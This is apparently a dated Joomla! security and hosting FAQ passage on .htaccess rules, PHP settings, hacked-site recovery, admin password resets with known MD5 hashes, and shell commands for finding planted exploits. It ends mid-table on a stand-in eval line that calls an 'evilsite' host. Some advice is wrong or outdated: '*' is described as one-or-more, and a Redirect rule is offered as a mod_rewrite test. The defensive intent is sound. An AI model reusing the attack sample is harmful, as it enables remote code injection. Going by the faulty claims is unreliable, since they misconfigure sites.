When configuring ModSecurity, it is important to know that it is not only the Joomla! application that may require unique rules, but also the data that the application processes.

Quality hosting providers customize mod_security rules to suit each customer.

If you have a conflict between Joomla and ModSecurity, it is often third party components, and sometimes even contact form submissions that trigger the problem. Joomla out of the box ''usually'' works with typical ModSecurity settings, but this is dependent on each hosting provider's unique configuration.

Overall, mod_security is a excellent tool, but this is really something your host should manage.

ModSecurity configurations are far too varied and complex to describe here. To learn more, see the following resources:

'''Resources'''

# [http://www.modsecurity.org/ Official ModSecurity Site]
# [http://www.modsecurity.org/projects/modsecurity/apache/index.html ModSecurity and Apache]

== How do I block directory scans using .htaccess? ==

'''Directions'''

Add Apache rewrite rules to your .htaccess file. For example, the following will redirect all attempts to access files with names starting with, "phpMyAdmin" to index.php.

'''Sample Apache Rewrite Rule'''

RewriteRule ^/phpMyAdmin.*$ /index.php

'''Some Regular Expression Tips'''

^ Means start of filename
. Means any character other than newlines
* Means one or more of the previous character
$ Means end of line

==How can I change PHP settings using .htaccess? ==

'''Introduction'''

This FAQ explains how to set boolean PHP configuration directives using php_flag. The format for php_flag is: php_flag name on|off

'''Directions'''

1. Open the .htaccess file located in your site's home directory, or if you don't have one, create a blank one now. Note the period character (.) at the beginning of the file name.

2. Add any of the following code samples to your .htaccess file, each on it's own line. These sample commands will prevent common global variable injection attacks, cross site scripting (XSS) sttacks, and code injection attacks.

php_flag register_globals off

php_flag allow_url_fopen off

php_flag magic_quotes_gpc on

''Note that although the magic_quotes_gpc directive adds a layer of security, for performance reasons it is not considered a best practice. If you have verified that your site correctly filters and validates all user data (and every production site really should), then there is no need to add this directive. If you have any doubt, add it.''

3. Save the .htaccess file in your site's home directory.

4. Test your site's front end and back end.

==How does FastCGI effect Joomla?==

When PHP runs from FastCGI, your server runs the PHP interpreter like an Apache module, but with the rights of your user account. Usually, the PHP interpreter is either running as the user of the webserver (which is fast, but insecure, since everyone's scripts run with the same rights), or as a CGI program, which is slow. Thus, FastCGI is a good solution for shared hosting.

Since the PHP interpreter runs as a single instance, it does (AFAIK) not parse the .htaccess or php.ini files per directory. To change php.ini settings, your host must offer you a method to set up or modify your own php.ini, or at least parts of it. Here is how one of host does this: it parses one php.ini file (which the user can modify) once an hour, and puts some well-defined settings into the web server's main php.ini file. Thus, users are able to change some settings for their site only, such as turning register_globals off, switching between PHP4 and PHP5.

If your server uses FastCGI, you can ask them to enable a method such as the above example, or you may be able to ask them adjust some settings for you.

==How can I check if mod_rewrite is enabled?==

Many problems with search engine optimization (SEO) arise from the fact that a host has not enabled mod_rewrite on the server.

1. Enable SEO in your administrator! (administrator > SEO > Enable > Save)

2. Rename your htaccess.txt to .htaccess, or use your existing .htaccess file.

3. Place ONLY the following lines in your .htaccess file.

Options +FollowSymLinks
Redirect /joomla.html http://www.joomla.org

4. Point your browser to: http://www.mysite.com/joomla.html

(Replace 'mysite.com' with your site's actual URL.)

5. If you are redirected to www.joomla.org, mod_rewrite is working. If you get an error, mod_rewrite is not working.

6. Note: if your site is located in a sub-domain, for example "test" you need to modify .htaccess as follows:

Options +FollowSymLinks
Redirect /test/joomla.html http://www.joomla.org

== How do I switch to PHP5 using .htaccess? ==

'''Overview'''

Many shared server environments currently run .php scripts using the PHP4 interpreter and .php5 code using the PHP5 interpreter. Rather than changing all your file extensions, and perhaps breaking many links, use a .htaccess file to dynamically map one extension to the other.

'''IMPORTANT CAVEAT:''' One common reason for doing this is that hosts leave PHP4 configured with register_globals ON in order to support legacy code while offering PHP5 with register_globals OFF. If you are on a shared server at a host that has configured register_globals ON server wide, you should be very worried!

Turning register globals OFF via a local php.ini or a .htaccess file will NOT offer you any extra protection. Another exploited account on your server can simple hack yours. For server security, and since php 4.2, register globals is OFF server wide by default (php default). Any host overriding this is inviting trouble. If you need register globals ON for a specific site, simple use a .htaccess file for that specific directory, and server wide security will not be compromised. Of course, if you do this be sure all effected scripts fully sanitize input data.

'''Requirements'''

1. Your Apache server must be configured to use .htaccess files. If not, you may be able to request this from your host.
2. Your Apache configuration must allow the following setting. If not, you may be able to request this from your host.
3. Your host must have configured the .php and .php5 file extensions as described above. If not, they may possibly have chosen other extensions. Check with your host.

'''Directions'''

1. Check to be sure your site is configured to use .htaccess files.

2. Make a backup of the .htaccess file in your root public_http directory. If you don't have a .htaccess file at this location, create one now.

3. There are various ways to set the comman, depending on your server configuration. One of the following will probably work. Add ONE the following lines at the end of your .htaccess file. If unsure which to use, check with your hosting provider on which version works best for your configuration.

AddType x-mapp-php5 .php
AddHandler application/x-httpd-php5 .php
AddHandler cgi-php5 .php

4. Carefully test.

5. Delete the backup .htaccess file. Don't leave backups of .htaccess files in public directories.

==How do I password protect directories using .htaccess?==

'''Overview'''

This FAQ explains how to protect the Joomla! /administrator/ directory on Apache servers using the htpasswd utility. You can easily adapt these instructions to protect other directories. If you need help finding or creating your .htaccess file, start here.

'''Caveat (From Apache.org)'''

Basic authentication should not be considered secure for any particularly rigorous definition of secure.
Although the password is stored on the server in encrypted format, it is passed from the client to the server in plain text across the network. Anyone listening with any variety of packet sniffer will be able to read the username and password in the clear as it goes across.

Not only that, but remember that the username and password are passed with every request, not just when the user first types them in. So the packet sniffer need not be listening at a particularly strategic time, but just for long enough to see any single request come across the wire.

And, in addition to that, the content itself is also going across the network in the clear, and so if the web site contains sensitive information, the same packet sniffer would have access to that information as it went past, even if the username and password were not used to gain direct access to the web site.

Don't use basic authentication for anything that requires real security. It is a detriment for most users, since very few people will take the trouble, or have the necessary software and/or equipment, to find out passwords. However, if someone had a desire to get in, it would take very little for them to do so.

Basic authentication across an SSL connection, however, will be secure, since everything is going to be encrypted, including the username and password.

'''Directions'''

1. If you are unfamiliar with the Apache htpasswd utility, you may want to read the following link first.
Apache Authentication, Authorization, and Access Control

2. Check to be sure your site is configured to use .htaccess files. If not sure, ask your host.

3. Decide where to put your .htaccess file. Because Apache recursively searches all directories in a path for .htaccess files, the higher in your directory structure you place this file, the more directories it will control. If there is already an .htaccess file in the directory you choose, it's probably best to add the new code to it.

4. Decide where to store your.htpasswd and .htgroups files. These files should NEVER be publicly accessable through the Web. Below is an example directory structure showing good locations for each file. Note that the /auth/ directory in this example is NOT accessible from the Web.

/home/mysite/public_html/.htaccess
/home/mysite/auth/.htpasswd/
/home/mysite/auth/.htgroups/

5. Create the .htpasswd and .htgroups files as explained in the official Apache HowTo, referenced above. (Since you've read the always current and official documentation at Apache.org, we'll spare you the trouble of displaying it again here.)

6. If a .htaccess file already exists in the directory you have chosen, make a backup copy. If the file does not exist, create a new file with that name now. (Don't forget the dot at the beginning of the name.)

7. Add the following code to the .htaccess file. Adjust the example paths (marked in red) as needed for your server. Adjust the group name that you created in step 5 if it differs from the below example.

AuthUserFile /home/auth/.htpasswd
AuthGroupFile /home/auth/.htgroups
AuthType Basic
AuthName "LWS"
require group admins

8. Test carefully.

9. Remove all backup .htaccess files from public_http directories.

10. If you can not use the Apache htpasswd utility, here's a free, online script that creates the necessary files for you. You'll need to know the user name, password, and path. The script does the rest for you. Note that for more advanced configuration, such as the use of groups, you'll need to edit the resulting files.

'''.htaccess Generator:''' http://www.webmaster-toolkit.com/htaccess-generator.shtml

== How do I restrict directory access by IP address using .htaccess? ==

'''Overview'''

This can be a very effective way to protect your Joomla! administrator directory. Any other directory in public_html can be protected in the same way. This method only works if you have a static IP address assigned to you. Anyone attempting to browse such directories using a different IP Address will get a 403 Forbidden error.

'''Directions'''
# In the directory you wish to protect, open (or create) a file called, .htaccess. (Note the dot at the beginning of the file name.)
# Add the following code to this file, replacing 100.100.100.100 in this example with the static IP address you plan to allow:

Order Deny,Allow
Deny from all
Allow from 100.100.100.100

* Optional: You can enter partial IP Addresses, such as, 100.100.100. This allows access to a range of addresses.

* Optional: You can add multiple addresses by separating them with comma's.

100.100.100.101, 100.100.100.102

==How do I convert an htaccess.txt file into a .htaccess file?==

'''Introduction'''

When using PHP as an Apache module, you can change the configuration settings using directives in Apache configuration files (e.g. httpd.conf and .htaccess files). You will need "AllowOverride Options" or "AllowOverride All" privileges to do so. If you control your own Apache configuration, you can and should use httpd.conf. If you do not control your Apache configuration (such as on a shared server), you must use .htaccess files.

'''Directions'''

# First look for the file, htaccess.txt in your root directory. It should have been installed during the Joomla! installation. (Note that this file name does not begin with a dot.) Open and carefully read htaccess.txt. It contains important suggestions on how to protect your site.
# Make any adjustments to this file as appropriate for your site, and then save it in your site's home directory as, .htaccess (including the dot).
# Test your site's front end and back end. If it produces errors, rename the file back to htaccess.txt, and troubleshoot your edits. If you are unable to get this working, you may have to leave the file named htaccess.txt.
# Use phpinfo() to ensure that all configurations set as you intended. Note: Web-accessible files that include phpinfo() are potential security risks they offer attackers lots of useful information about your server. Always remove such files after use.

'''More Information'''

* [http://us2.php.net/configuration.changes Official PHP Manual: How to change configuration settings]
* [http://us2.php.net/manual/en/ini.php#ini.list Official PHP Manual: List of PHP INI directives]

== How do I block direct hot linking to image files using .htaccess? ==

'''Caveats'''

# Your server must allow .htaccess files for this technique to work.
# If you do not have a .htaccess file in your root directory, see the related FAQ first.
# Do not use this method to redirect image hot links to HTML pages or to servers that are not your own.
# Hot linked images can only be replaced by other images, not with HTML pages.
# As with any .htaccess rewrite, you may block legitimate traffic, such as users behind proxies or firewalls.

'''Directions'''

# Create a jpeg image called no_hot_link.jpe. Note that the odd file extention (.jpe) is intentional and important. Place this file in your images directory.
# Place the following code in the .htaccess file of your root directory.

RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?your_site\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/no_hot_link.jpe [L]

'''Explanation'''

The first line begins the Apache rewrite rule. The second line matches any requests from your own site, here called your_site.com url. The [NC] flag means "No Case", which means, match upper and lower case characters. The third line allows empty referrals. The last line matches any files ending with the extension jpeg, jpg, gif, bmp, or png. This is then replaced by the no_hot_link.jpe file in your images directory. This JPEG file uses the extension jpe instead of jpg to prevent these rules from blocking your replacement image.
'''
Block hot linking from specific domains'''

To stop hotlinking from specific domains only, such as myspace.com, blogspot.com and livejournal.com, while allowing other web sites to hotlink to your images, use the following code:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://(.+\.)?myspace\.com/ [NC,OR]
RewriteCond %{HTTP_REFERER} ^http://(.+\.)?blogspot\.com/ [NC,OR]
RewriteCond %{HTTP_REFERER} ^http://(.+\.)?livejournal\.com/ [NC]
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpe [L]

You can add as many different domains as you want. Every RewriteCond line except the last one should end with the [NC,OR] flags. NC means to ignore case. OR means "Or Next", as in, match this line OR the next line. The last RewriteCond omits the OR flag to stop matching after the last RewriteCond.

'''Display a 403 forbidden code'''

Alternatively, you can display a 403 Forbidden error code. Replace the last line of the previous examples with this line:

RewriteRule .*\.(jpe?g|gif|bmp|png)$ - [F]

= PHP =

== Why is Joomla! written in PHP? ==

: Might as well get it from the horse's mouth. In [http://www.oracle.com/technology/pub/articles/php_experts/rasmus_php.html Do you PHP?], Rasmus Lerdorf, the originator of PHP, sums up how and why PHP developed as it did.

: ''"What it all boils down to is that PHP was never meant to win any beauty contests. It wasn't designed to introduce any new revolutionary programming paradigms. It was designed to solve a single problem: the Web problem. That problem can get quite ugly, and sometimes you need an ugly tool to solve your ugly problem. Although a pretty tool may, in fact, be able to solve the problem as well, chances are that an ugly PHP solution can be implemented much quicker and with many fewer resources. That generally sums up PHP's stubborness."''

== What is the latest stable release of PHP? ==

Check the [http://www.php.net/downloads.php official PHP download page] for information on the latest PHP release.

== How do I tune for speed with PHP5 and MySQL5? ==

: This is just a point by point summary of how I've been tuning and tweaking our Joomla sites to get them running as quickly as possible. For reference, we run all our sites off a Rackspace dedicated server, with 1Gb RAM, a 2Ghz dual core Athlon, running Apache 2.0.x (current revision), PHP 5.0.x (current revision) and MySQL 5.0.18.

: These are listed in terms of apparent speed increase - that is, not the sheer speed for the full page, but the speed before the page is usable to view content, even if not all features are loaded.

# PHP caching. I had been running eAccelerator, but switched to APC today, and it has made the system even faster than before, and eAccelerator was a big boost over uncached PHP. Joomla is a big complex system, so using precompiled code is a big time saver. I use a 128Mb in-memory cache, which is plenty for our needs.
# MySQL Query Caching. This one will vary depending on how dynamic your site is, and you can really kill the benefits by using the wrong extensions (any date/time based will need checking), but if you are serving pretty much the same queries each page load, it will drop the load times noticably.
# Template Image optimisation - template images really slow down the initial page load for first time visitors, so optimising the hell out of them makes sense. Remember that your template is probably not going to change as often as your story content, so you can afford to spend more time on optimising the images for it that you would otherwise. I recommend Irfanview, with the pngout plugin active for PNG images, and it isn't bad for JPG and GIF images either. Don't forget to ramp up the compression level of PNGs, and, if possible, reducing them to indexed pallettes.
# CSS compression. Easy one this - put a little script to output a gzipped version of your CSS file(s) and point your index.php at it. Example script below - I didn't write it, but it's short, to the point, and works.

ob_start ("ob_gzhandler");
header("Content-type: text/css");
header("Cache-Control: must-revalidate");
$offset = 60 * 60 ;
$ExpStr = "Expires: " .
gmdate("D, d M Y H:i:s",
time() + $offset) . " GMT";
header($ExpStr);

# Strip unneeded modules, components, mambots from Joomla. If you haven't used them, the impact on your loading time is minimal, but with more components/modules active, there are more points of failure, and Apache errors are slow!
# Scrutinise the Apache error log. It is amazing how many errors can crop up even with a fairly minimal Joomla install, and they don't necessarily affect the appearance of the page. Check your error log, especially if you are using custom components/modules, or any non-standard config settings. Once you've noticed any problems, it's time to fix the code creating them, and test thoroughly before uploading the fixed versions.
# Keep rechecking as you add/remove features, redesign or change any server configuration options. Even things like adding virtual servers in Apache can affect speed of the server, as a missed config setting can cause general Apache delays.

== Should PHP run as a CGI script or as an Apache module? ==

There are two ways to configure Apache to use PHP: 

# Configure Apache to load the PHP interpreter as an Apache module
# Configure Apache to run the PHP interpreter as a CGI binary

(PS: Windows IIS normaly configures as CGI by the way) 

It is the intention of this post to provide you information relating to
the configuration and recognition of each method. "In general"
historically only one method or the other has been implemented,
however, with the architectural changes made to PHP starting with PHP5,
it has been quite common for hosting firms to configure for both. One
version running as CGI and one version running as a Module. It is
generally accepted more recently that running PHP as a CGI is more
secure, however, running PHP as an Apache Module does have a slight
performance gain and is generally how most pre-configured systems will
be delivered out of the box.

What is the difference between CGI and apache Module Mode? 

An Apache module
is compiled into the Apache binary, so the PHP interpreter runs in the
Apache process, meaning that when Apache spawns a child, each process
already contains a binary image of PHP. A CGI is executed as a single
process for each request, and must make an exec() or fork() call to the
PHP executable, meaning that each request will create a new process of
the PHP interpreter. Apache is much more efficient in it's ability to
handle requests, and maaging resources, making the Apache module
slightly faster than the CGI (as well as more stable under load). 

CGI Mode
on the other hand, is more secure because the server now manages and
controls access to the binaries. PHP can now run as your own user
rather than the generic Apache user. This means you can put your
database passwords in a file readable only by you and your php scripts
can still access it! The "Group" and "Other" permissions ( refer <a href="component/option,com_easyfaq/task,view/id,73/Itemid,268/" target="_blank">Permissions FAQ</a>

can now be more restrictive. CGI mode is also claimed to be more
flexible in many respects as you should now not see, with phpSuExec (
refer [http://www.joomlatutorials.com/faq/60.html" target="_blank Permissions under phpSuExec]
issues with file ownership being taken over by the Apache user,
therefore you should no-longer have problems under FTP when trying to
access or modify files that have been uploaded through a PHP interface,
such as Joomla! upload options.

If your server is
configured to run PHP as an Apache module, then you will have the
choice of using either php.ini or Apache .htaccess files, however, if
your server runs PHP in CGI mode then you will only have the choice of
using php.ini files locally to change settings, as Apache is no longer
in complete control of PHP.

<hr />

Testing and Reviewing Your PHP Installation 

Also known as "Everything you ever wanted and didn't want to know about PHP"

To
find out the PHP interpreter mode and to generally test your PHP
installation and to find out a vast amount of information about your
PHP environment, supported utilities, applications and settings, you
create a single PHP file containing only the following lines; 


phpinfo(); 

This single line of code outputs an amazing amount of information, be warned.... <img src="http://forum.joomla.org/Smileys/joomla/wink.gif" alt="Wink" border="0" />

Save the file as any filename you wish, but with the ".php" extension. FTP it to your server and open it in a browser.

Other useful information

The following are PHP functions, that when run from a PHP File can provide some useful information, (less than the above option) many should run on most hosts, however many hosts disable some of these functions for security. No Guarantee's offered...

Again,
as above, make a file, name it anything you wish but make sure it has
the ".php" extension, copy and paste the following lines in to it and
FTP to your server. 

echo "Hostname: ". @php_uname(n) ."";
if (function_exists( 'shell_exec' )) { echo "Hostname: ".
@gethostbyname(trim(`hostname`)); } else { echo "Server IP: ".
$_SERVER['SERVER_ADDR'] .""; }
echo "Platform: ". @php_uname(s) ." ". @php_uname(r) ." ". @php_uname(v) ."";
echo "Architecture: ". @php_uname(m) ."";
echo "Username: ". get_current_user () ." ( UiD: ". getmyuid() .", GiD: ". getmygid() ." )";
echo "Curent Path: ". getcwd () ."";
echo "Server Type: ". $_SERVER['SERVER_SOFTWARE'] . "";
echo "Server Admin: ". $_SERVER['SERVER_ADMIN'] . "";
echo "Server Signature: ". $_SERVER['SERVER_SIGNATURE'] ."";
echo "Server Protocol: ". $_SERVER['SERVER_PROTOCOL'] ."";
echo "Server Mode: ". $_SERVER['GATEWAY_INTERFACE'] .""; 
?>

The Joomla! HISA or Joomla! Tools Suite can also assist to determine which mode your server in running in, also
providing a large amount of other related information including
recommendations on configuration; 
 

Joomla! Tools Suite (JTS) is a complete "Suite" of Tools to help you troubleshoot and maintain Joomla! and include the "HISA" script 
<a href="http://joomlacode.org/gf/project/jts/" target="_blank">Download JTS Here</a> 
 
Joomla! Health, Installation and Security Audit (HISA) is a single standalone script that provides purely configuration information. 
<a href="http://joomlacode.org/gf/project/hisa/" target="_blank">Download HISA Here</a> 
 
<a href="http://forum.joomla.org/index.php/topic,136328.0.html" target="_blank">Forum Discussion Here</a> 
<a href="http://www.joomlatutorials.com/faq/60.html" target="_blank">How to TroubleShoot A Joomla! Installation</a> 
 
Another Indirect method,
and possibly not 100% reliable, is that if you are unable to make use
of .htaccess on Linux hosting and Apache based servers then you are
either running in CGI mode or your host has disabled the use of
.htaccess even if your server is running PHP as an Apache Module. 

Remove these files immediately after use, the information contained in their
output is extensive and explicit regarding your PHP and server
configurations, it will help those wishing to cause your site harm 

For those wishing to know more about "How To..."

Running PHP as an Apache module 
To configure Apache to load PHP as a module to 'parse'
your PHP scripts, the httpd.conf needs to be modified, typically found
in "c:\Program Files\Apache Group\Apache\conf\" or "/etc/httpd/conf/". 

Search for the section of the file that has a series of commented out
"LoadModule" statements. (Statements prefixed by the hash "#" sign are
regarded as having been commented out.) If PHP is running in "Apache
Module" Mode you should see something very similar to the following; 

LoadModule php4_module "c:/php/php4apache.dll" 

Apache 1.x

For PHP5
LoadModule php5_module C:/php/php5apache2.dll 
or (platform dependant) 
LoadModule php5_module /usr/lib/apache/libphp5.so 

For PHP4 

LoadModule php4_module libexec/libphp4.so 
or (platform dependant) 

LoadModule php4_module C:/php/php4apache.dll 

and 
AddModule mod_php4.c 
or 
AddModule mod_php5.c 
 
Apache 2.x 

For PHP5

LoadModule php5_module C:/php/php5apache2.dll 

or (platform dependant)

LoadModule php5_module /usr/lib/apache/libphp5.so 

For PHP4 

LoadModule php4_module libexec/libphp4.so 
or (platform dependant) 
LoadModule php4_module C:/php/php4apache.dll 

and 
AddModule mod_php5.c 

or 
AddModule mod_php4.c 

Note: 
Don't worry that you can't find a "mod_php4.c" or "mod_php5.c" file anywhere on your system. That directive does not cause Apache to search for the file on your system. For the curious, it specifies the order in which the various modules are enabled by the Apache server. 

If you're using Apache 2.x, you do not have to insert the AddModule directive. It's no longer needed in that version. Apache 2.x has its own internal method of determining the correct order of loading the modules.

Now find the "AddType" section in the file, and add the following line after the last "AddType" statement:

AddType application/x-httpd-php .php 

If you need to support other file types, like ".php3" and ".phtml", simply add them to the list, like this:<

AddType application/x-httpd-php .php3 
AddType application/x-httpd-php .phtml 

Run a syntax check and if all is ok, restart Apache... 

<hr />
Running PHP as a CGI binary 
To configure PHP to run as a CGI, again you will need to configure the
httpd.conf, but confirm that the above settings are not also
configured, unless you now what you are doing you can generate yourself
"HTTP 500" errors. Search your Apache configuration file for the
"ScriptAlias" section.

Add the following line below after the ScriptAlias for "cgi-bin". 

Note:

The location will depend on where PHP is installed on your system, you
should substitute the appropriate path in place of "c:/php/" (for
example, "c:/Program Files/php/"). 

ScriptAlias /php/ "c:/php/" 

Apache
again needs to be configured for the PHP MIME type. Search for the
"AddType" section, and add the following line after it: 

 
AddType application/x-httpd-php .php 
 
As
in the case of running PHP as an Apache module, you can add whatever
extensions you want Apache to recognise as PHP scripts, such as: 
 
AddType application/x-httpd-php .php3 
AddType application/x-httpd-php .phtml 
 
 
Next,
you will need to tell the server to execute the PHP executable each
time it encounters a PHP script. Add the following below any existing
entries in the "Action" section. 

 
Action application/x-httpd-php "/php/php.exe" 
 
If
you notice, we have used the "ScriptAlias" reference, "/php/" portion
will be recognised as the scriptAlias configured above, this is sort a
path alias which will correlate to your PHP installation path
configured previously. In other words, don't put "c:/php/php.exe"
or "c:/Program Files/php/php.exe" in that directive, put

"/php/php.exe", Apache WILL work it out if correctly configured. 
<hr />
 
 
Configuring the Default Index Page 
This section applies to all users, whether you are loading PHP as a module
or running it as a CGI binary, and has been seen often enough to
warrant a mention. 
 
If you want to make your PHP script execute
as the default page for a directory, you have to add another line to
the "httpd.conf". Simply search for the line in the file that begins
with a "DirectoryIndex" and add "index.php" to the list of files on
that line. For example, if the line used to be: 

 
DirectoryIndex index.html 
 
change it to 
 
DirectoryIndex index.html index.php 
If you still wish .html files to be executed before .php files 
 
or 
DirectoryIndex index.php index.html 
If you wish .php files to be executed before .html files 

 
The next time you access the site or a directory within a site without a
filename, Apache will "auto-magically" deliver "index.php" if
available, or "index.html" if "index.php" is not available.

== Why shouldn't I use PHP safe_mode? ==

'''Overview'''

Enabling safe_mode is not needed if other reasonable security precautions are followed. Using safe_mode for web site security is a poor compromise in a bad situation. It may make sense in some situations, but there is almost always a better way. Because safe_mode in some sense only gives the illusion of safety, it will be removed from PHP starting with version 6.0.

The Joomla! core works fine with or without PHP safe_mode. The one execption to this rule is the installation script. This is because safe_mode, by design, turns off the PHP functions that enable easy uploading via a Web browser. If you do use safe_mode, and need to perform installs via the Web browser, temporarily turn safe_mode OFF, and turn it back ON when finished.

Some third-party extensions may require the specific PHP functions that are blocked by safe_mode. Such extensions should be carefully evaluated to be sure you understand exactly why they require such powerful and potentially dangerous functions.

'''From the official PHP site'''

''"The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially ISP's, use safe mode for now."''
'''
More Information'''

# [http://us3.php.net/manual/en/features.safe-mode.php#ini.safe-mode Official PHP Manual: PHP Security and Safe Mode Configuration Directives]
# [http://us3.php.net/manual/en/features.safe-mode.functions.php Official PHP Manual: PHP Functions restricted/disabled by safe mode]

= Development =

== How do I setup a secure demo site? ==

In /includes/version.php look for:

/** @var string Whether site is a production = 1 or demo site = 0 */
var $SITE = 1;
/** @var string Whether site has restricted functionality mostly used for demo sites: 0 is default */
var $RESTRICT = 0;

For a demo site it is advised to following:

/** @var string Whether site is a production = 1 or demo site = 0 */
var $SITE = 0;
/** @var string Whether site has restricted functionality mostly used for demo sites: 0 is default */
var $RESTRICT = 1;

$SITE = 0
// Allows multiple user logins with only one account. By default Joomla!
// allows only one active session per account as a security feature.

$RESTRICT = 1
// Disables those logging in, both Front-end and Back-end from changing
// user details - like password and username

These settings are used on the official demo site http://demo.joomla.org

You should also make all files and folders nonwriteable - especially the configuration.php file. Also recommend you setup an automatic cron job that refreshes the database at a set interval (in our case 60mins) from a db script.

== How can I view a live site while developing, but hide it from others? ==

'''Introduction'''

The method described below should be used for relatively minor modifications, such as adjusting menus or quickly reorganizing content sections. More complex tasks, such as installing new components or adjusting complex configuration settings should be performed and tested on a development server first. Not only does this keep your public site up and running, but it also lets you test at your leisure, thus reducing errors. One way to do it is to create a sub-domain (i. e., dev.yourdomain.com) and install Joomla! there just as it is installed on your public site.

'''Directions'''

1. Login to the administrator section, and choose: Site > Global Configuration.

2. The first option you'll see is is to set the site offline. Choose "Yes" and press the Save button. This will hide prevent display of all site pages, and replace them with the following message:

"This site is down for maintenance. Please check back again soon. message instead."

3. While you are logged into the "back end" administrator system, you can still view the "front end," by choosing Site > Template > Preview. This will display the site as it would appear to users along with a warning at the top that the site is down for maintenance.

= Site Recovery =

== Help! My site's been compromised. Now what? ==

'''Directions'''

# '''Change all relevant passwords:''' Assume your passwords have been harvested and immediately change all critical passwords, including shell access, FTP access, Joomla! Administrator accounts, and the database account.
# '''Check raw logs:''' Identify when and how the attackers gained access to your site by carefully reviewing your raw server logs. Make careful note of the date/time and names of attacked files. Note that these logs may have been deleted or altered, so a lack of evidence does not prove a lack of activity.
# '''List recently modified files:''' Before making any changes to your site, generate a list of recently modified files. Here's a php script that will list the files for you. Remove this script as soon as you have your list and don't publish a link to it!
# '''Note suspicious newly-created files:''' Use this list to identify new files that don't belong. Pay particular attention to their creation and modification dates, and correlate them to the dates of attacks shown in your log files.
# '''Note suspicious recently-modified files:''' Check the modified files list for any files that were recently changed. Pay particular attention to the modification, and correlate them to the dates of attacks shown in your log files.
# '''Check for bogus CRON Jobs:''' Hacked cron jobs can be setup to reinfect your site over and over again.
# '''Coordinate with your host:''' If you have identified how you were cracked, report the method to your host. If you are on a shared server, you may habe been attacked through another vulnerable site on your server. Report this to your host. A reputable host will appreciate your efforts in this area.
# '''Delete the entire public_html directory:''' This is the best way to guarantee that every potential vulnerability in that site is removed.
# '''Delete related database records:''' This step may only be possible if you have good backups. Simple script kiddies, who are only trying to mark your index page, may not attack your database, but professionals are usually very interested in confidential data, such as passwords. They may pose as script kiddies to avoid suspicion while repeatedly harvesting confidential information from your database.
# '''Reinstall everything:''' Use pre-crack backups. If you don't have good backups, go on to step 10.
# '''Reset critical passwords again:''' You must reset your passwards again now that your server is finally cleaned of any possible, hidden trojan horses.
# '''Rebuild site:''' If you are unable to rebuild from clean backups, rebuild your entire site using original, pre-crack installs. Use only the latest stable versions of all software, and check the List of Vulnerable Extensions
# '''Review security processes:''' Follow standard security precautions for important settings in php.ini, globals.php, configuration.php, .htaccess, etc.
# '''Review backup processes:''' If you don't already have one, add a dependable backup process to your site administration practices.
# '''Stay watchful:''' Attackers often return repeatedly. Closely monitor your raw logs for suspicious activity.

==How do I reset an administrator password?==

'''Introduction'''
Because passwords are stored using a one-way MD5 hash which prevents recovering the password, you cannot recover an existing password, but you can reset it to a new password by editing the password field in the database. In the following directions, you will set the password MD5 value to a known value and then log-in using the password that matches that value. Once logged in, you can change the password again using normal Joomla! user access screens.

'''Joomla! 1.0.13 Enhanced Password System'''
Initial tests indicate that the method described here also works with Joomla! 1.0.13 salt-enhanced passwords. This is because Joomla! automatically updates password data from earlier versions to the 1.0.13 format.

'''Directions'''

1. Use a MySQL utility such as phpMyAdmin or MySQL Query Browser .

2. Open the correct database and select the table, jos_users . (Change default table prefix, 'jos_' to your table prefix if it is different.)

3. Select the record (or table row) for your administrator account.

4. Copy and paste a known MD5 hash, such as one of the samples provided with this FAQ, into the password field.
Warning: You must paste the password's hash value, not the password itself. You can use any of the following password = hash pairs, or create your own using one of the tools listed below.

password = "MD5 hash of password"
------------------------------------------------------
admin = 21232f297a57a5a743894a0e4a801fc3
secret = 5ebe2294ecd0e0f08eab7690d2a6ee69
OU812 = 7441de5382cf4fecbaa9a8c538e76783

5. Save the record.

6. Point your browser to your site and log as the administrator using your new password.

7. Once logged in, you should change the password again to one that only you know.

'''Generating your own MD5 hash from a password of your choice'''

Alternatively, you can set the password to a value of your own choice. Use tools, such as the following, to create your own strong hashed password. Use the above directions once you've generated a hash with these tools.

'''Online MD5 hash creation tools'''
* JavaScript MD5 - http://pajhome.org.uk/crypt/md5/
* MD5er - http://www.md5er.com/

'''Free MD5 utilities for download'''
* MD5 & Hashing Utilities - http://www.digital-detective.co.uk/freetools/md5.asp
* SlavaSoft HashCalc - http://www.slavasoft.com/hashcalc/overview.htm

'''Other MD5 tools'''
* There are many free online and downloadable MD5 utilities. Google "MD5 hash tool"

== How do I find exploits using the *NIX shell? ==

'''Check the active processes'''

Use the "ps" command to look for odd or unknown processes, if you aren't sure what to look for there, user "netstat -ae | grep irc" and/or "netstat -ea | grep 666" and look for ports 6666, 6667, 6668, 6669, these are common ports used for running IRC bots, they may have the name "irc" listed against them, or may have "httpd" or sometimes other regular services names.

'''Check crontab'''

Check your crontab and see if there is a strange entry, these are used in many exploits to restart IRC bots, even when admins or automated process monitors are used to kill a rogue process.

'''Check for hidden files or directories'''

Check for hidden files or directories you dont expect to see, those starting with "." (dots) and also look for ". " (dot, space) often favored to try and catch searches for hidden directories.

Other examples of searches that may help pin down exploits and/or unexpected files and folders:

find /home -type f | xargs grep -l MultiViews
find . -type f | xargs grep -l base64_encode <<< this can produce false positives, it is valid in many mail/graphics scripts
find . -type f | xargs grep -l error_reporting
find / -name "[Bb]itch[xX]"
find / -name "psy*"
ls -lR | grep rwxrwxrwx > listing.txt

== What are these strange (URL-Encoded) characters doing in my code? ==

Overview

Attackers sometimes hide code away from prying eyes by URL Encoding it.

The purpose of URL Encoding is to allow non-URL compatible characters to be passed via the URL. There are many legitimate reasons for doing this, such as hiding email from spammers, dealing with spaces in file names. etc.

However, if you find odd, URL-encoded text in your site's files, you should investigate immediately. URL encoded text is very easy to translate using PHP, javascript, or one of the many free, online translators.

Here are some trivial, non-functioning examples of URL Encoded text:

<table border="1">
<tr>
<th>Original</th>
<th>URL Encoded</th>
</tr>
<tr valign="top">
<td>this line has spaces</td>
<td>this%20line%20has%20spaces</td>
</tr>
<tr valign="top">
<td>eval(evil_script(http://www.evilsite/?evilscript.pl"));</td>
<td>%65val%28%65%76il_%73cri%70t
%28%68tt%70%3A//%77%77%77.
